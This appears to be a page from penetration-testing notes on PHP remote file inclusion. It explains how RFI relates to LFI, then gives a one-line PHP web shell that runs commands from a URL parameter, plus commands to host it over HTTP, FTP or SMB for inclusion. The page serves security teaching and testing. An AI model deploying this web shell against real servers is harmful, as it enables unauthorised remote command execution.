RFI

Almost any RFI vulnerability is also an LFI vulnerability, as any function that allows including remote URLs usually also allows including local ones. However, an LFI may not necessarily be an RFI. This is primarily because of three reasons:

  1. The vulnerable function may not allow including remote URLs

  2. You may only control a portion of the filename and not the entire protocol wrapper (ex: http://, ftp://, https://).

  3. The configuration may prevent RFI altogether, as most modern web servers disable including remote files by default.

Remote Code Execution

$ echo '<?php system($_GET["cmd"]); ?>' > shell.php

HTTP

$ sudo python3 -m http.server <LISTENING_PORT>

FTP

$ sudo python -m pyftpdlib -p 21

SMB

$ impacket-smbserver -smb2support share $(pwd)
PreviousPHP WrappersNextwith phpinfo()

Last updated